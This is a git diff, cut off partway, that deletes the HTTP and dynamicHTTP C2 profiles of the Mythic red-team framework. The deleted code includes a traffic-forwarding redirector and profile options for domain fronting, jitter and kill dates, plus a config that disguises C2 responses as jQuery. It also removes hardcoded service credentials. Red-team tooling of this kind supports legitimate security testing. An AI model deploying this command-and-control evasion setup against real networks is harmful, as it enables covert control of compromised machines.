diff --git a/.env b/.env deleted file mode 100755 index 025b67abc..000000000 --- a/.env +++ /dev/null @@ -1,2 +0,0 @@ -COMPOSE_PROJECT_NAME=apfell -POSTGRES_PASSWORD=super_secret_mythic_user_password \ No newline at end of file diff --git a/.gitignore b/.gitignore index 3c1d47a88..d09bc15fb 100755 --- a/.gitignore +++ b/.gitignore @@ -3,7 +3,7 @@ __pycache__/ # Sphinx documentation docs/_build/ # Environments -#.env +.env .venv env/ venv/ @@ -14,12 +14,17 @@ venv.bak/ .idea/ # ssl certs ssl/ -# downloaded files +# Mythic files files/ mythic_access.* postgres-docker/database/ rabbitmq-docker/storage/ -**/transforms.py +C2_profiles/ +Payload_Types/ +Docker_Templates/ +documentation-docker/content/ +display_output.txt +nginx-docker/config/conf.d/services.conf ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. ## @@ -139,4 +144,7 @@ $tf/ # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper -*.DotSettings.user \ No newline at end of file +*.DotSettings.user + +# vscode +.vscode/ \ No newline at end of file diff --git a/Payload_Types/poseidon/agent_code/cd/.gitkeep b/C2_Profiles/.gitkeep old mode 100755 new mode 100644 similarity index 100% rename from Payload_Types/poseidon/agent_code/cd/.gitkeep rename to C2_Profiles/.gitkeep diff --git a/C2_Profiles/HTTP/Dockerfile b/C2_Profiles/HTTP/Dockerfile deleted file mode 100755 index fd1da732e..000000000 --- a/C2_Profiles/HTTP/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 \ No newline at end of file diff --git a/C2_Profiles/HTTP/c2_code/config.json b/C2_Profiles/HTTP/c2_code/config.json deleted file mode 100755 index ef793bb94..000000000 --- a/C2_Profiles/HTTP/c2_code/config.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "instances": [ - { - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "port": 80, - "key_path": "", - "cert_path": "", - "debug": false - } - ] -} diff --git a/C2_Profiles/HTTP/c2_code/fake.html b/C2_Profiles/HTTP/c2_code/fake.html deleted file mode 100755 index 3968cb8fc..000000000 --- a/C2_Profiles/HTTP/c2_code/fake.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - Page Not Found! - - - - - \ No newline at end of file diff --git a/C2_Profiles/HTTP/c2_code/server b/C2_Profiles/HTTP/c2_code/server deleted file mode 100755 index fe3f6d869..000000000 --- a/C2_Profiles/HTTP/c2_code/server +++ /dev/null @@ -1,125 +0,0 @@ -#!/usr/bin/env python3 - -from sanic import Sanic -from sanic.response import html, redirect, text, raw -from sanic.exceptions import NotFound -import sys -import asyncio -import ssl -from pathlib import Path -import requests -import json -import os - -config = {} - -async def print_flush(message): - print(message) - sys.stdout.flush() - - -def server_error_handler(request, exception): - if request is None: - print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") - sys.stdout.flush() - return html("Error: Failed to process request", status=500, headers={}) - return html("Error: Requested URL {} not found".format(request.url), status=404, headers=config[request.app.name]['headers']) - - -async def agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - await print_flush(" and URI: {}".format(request.query_string)) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - if request.method == "POST": - # manipulate the request if needed - #await MythicCallbackRPC().add_event_message(message="got a POST message") - response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers=request.headers) - else: - # manipulate the request if needed - #await MythicCallbackRPC().add_event_message(message="got a GET message") - #msg = await MythicCallbackRPC().encrypt_bytes(with_uuid=True, data="my message".encode(), uuid="eaf10700-cb30-402d-b101-8e35d67cdb41") - #await MythicCallbackRPC().add_event_message(message=msg.response) - response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers=request.headers) - return raw(response.content, headers=config[request.app.name]['headers'], status=response.status_code) - except Exception as e: - if request is None: - await print_flush("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") - return server_error_handler(request, e) - if config[request.app.name]['debug']: - await print_flush("error in agent_message: {}".format(str(e))) - return server_error_handler(request, e) - - - -if __name__ == "__main__": - sys.path.append("/Mythic/mythic") - from C2ProfileBase import * - from MythicCallbackRPC import * - config_file = open("config.json", 'rb') - main_config = json.loads(config_file.read().decode('utf-8')) - print("Opening config and starting instances...") - sys.stdout.flush() - # basic mapping of the general endpoints to the real endpoints - try: - config['mythic_address'] = os.environ['MYTHIC_ADDRESS'] - except Exception as e: - print("failed to find MYTHIC_ADDRESS environment variable") - sys.stdout.flush() - sys.exit(1) - # now look at the specific instances to start - for inst in main_config['instances']: - config[str(inst['port'])] = {'debug': inst['debug'], - 'headers': inst['ServerHeaders']} - if inst['debug']: - print("Debugging statements are enabled. This gives more context, but might be a performance hit") - else: - print("Debugging statements are disabled") - sys.stdout.flush() - # now to create an app instance to handle responses - app = Sanic(str(inst['port'])) - app.config['REQUEST_MAX_SIZE'] = 1000000000 - app.config['REQUEST_TIMEOUT'] = 600 - app.config['RESPONSE_TIMEOUT'] = 600 - app.add_route(agent_message, "/", methods=['GET','POST']) - app.add_route(agent_message, "/", methods=['GET','POST']) - app.error_handler.add(Exception, server_error_handler) - keyfile = Path(inst['key_path']) - certfile = Path(inst['cert_path']) - if keyfile.is_file() and certfile.is_file(): - context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) - context.load_cert_chain(inst['cert_path'], keyfile=inst['key_path']) - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=False) - if inst['debug']: - print("using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - else: - if inst['debug']: - print("not using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=False) - task = asyncio.ensure_future(server) - - try: - loop = asyncio.get_event_loop() - def callback(fut): - try: - fetch_count = fut.result() - except: - print("port already in use") - sys.stdout.flush() - sys.exit() - task.add_done_callback(callback) - loop.run_forever() - except: - sys.exit() - loop.stop() diff --git a/C2_Profiles/HTTP/mythic/C2ProfileBase.py b/C2_Profiles/HTTP/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/HTTP/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/HTTP/mythic/MythicBaseRPC.py b/C2_Profiles/HTTP/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/HTTP/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py b/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index e4ff3b5e9..000000000 --- a/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response diff --git a/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py b/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py deleted file mode 100644 index df796d9dd..000000000 --- a/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py +++ /dev/null @@ -1,195 +0,0 @@ -from C2ProfileBase import * - - -class HTTP(C2Profile): - name = "HTTP" - description = "Uses HTTP(S) connections with a simple query parameter or basic POST messages. For more configuration options use dynamicHTTP." - author = "@its_a_feature_" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - required=False, - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="get_uri", - description="GET request URI", - default_value="index", - required=True, - ), - C2ProfileParameter( - name="post_uri", - description="POST request URI", - default_value="data", - required=True, - ), - C2ProfileParameter( - name="query_path_name", - description="Name of the query parameter", - default_value="q", - required=True, - ), - C2ProfileParameter( - name="proxy_host", - description="Proxy Host", - default_value="", - required=False, - verifier_regex="^$|^(http|https):\/\/[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="proxy_port", - description="Proxy Port", - default_value="", - verifier_regex="^$|^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="proxy_user", - description="Proxy Username", - default_value="", - required=False, - ), - C2ProfileParameter( - name="proxy_pass", - description="Proxy Password", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - ] -""" -C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - parameter_type=ParameterType.Array, - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - required=False, - parameter_type=ParameterType.Dictionary, - default_value=[ - { - "name": "USER_AGENT", - "max": 1, - "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "default_show": True, - }, - { - "name": "host", - "max": 2, - "default_value": "", - "default_show": False, - }, - { - "name": "*", - "max": -1, - "default_value": "", - "default_show": False - } - ] - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ),""" \ No newline at end of file diff --git a/C2_Profiles/HTTP/mythic/mythic_service.py b/C2_Profiles/HTTP/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/HTTP/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." + pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! " + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/dynamicHTTP/Dockerfile b/C2_Profiles/dynamicHTTP/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/dynamicHTTP/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/dynamicHTTP/c2_code/agent_config.json b/C2_Profiles/dynamicHTTP/c2_code/agent_config.json deleted file mode 100755 index 978837fa8..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/agent_config.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "GET": { - "ServerBody": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": ["!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return 